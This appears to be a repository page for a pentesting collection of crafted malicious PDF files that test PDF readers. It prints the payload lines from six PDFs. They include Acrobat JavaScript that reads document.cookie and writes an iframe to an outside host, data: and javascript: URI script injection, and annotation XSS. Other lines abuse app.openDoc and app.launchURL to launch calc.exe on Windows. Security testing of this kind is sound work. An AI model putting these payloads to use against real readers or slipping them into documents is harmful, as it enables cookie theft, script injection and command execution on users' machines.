• Stars
    star
    210
  • Rank 187,585 (Top 4 %)
  • Language
  • License
    Apache License 2.0
  • Created over 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PDF Files for Pentesting

Payloads All The PDFs

Follow @evaristegal0is

A list of crafted malicious PDF files to test the security of PDF readers and tools.

Vulnerabilities found

Payloads list

payload1.pdf

Line 31. Understand if Acrobat Javascript APIs are supported.

/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=https://14.rs>');"))().next();)

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

/URI (data:text/html,<script>alert\(2\);</script>)

Line 177. Try to inject Javascript code using annotations.

<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (οΏ½οΏ½^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>

payload2.pdf

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

/URI (\">'><details open ontoggle=confirm\(2\)>)

payload3.pdf

Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.

/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src='https://14.rs'>"\);)

Line 69. Try to run remote commands on Windows.

/URI (file:///C:/Windows/system32/calc.exe)

payload4.pdf

Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)

Line 69. Try to run remote commands on Windows.

 /URI (START C:/\Windows/\system32/\calc.exe)

payload5.pdf

Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

 /URI (javascript:confirm\(2\);)

payload6.pdf

Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

 /JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)

Hack the planet

If you want to support me you can offer me a coffee β˜•

Buy Me A Coffee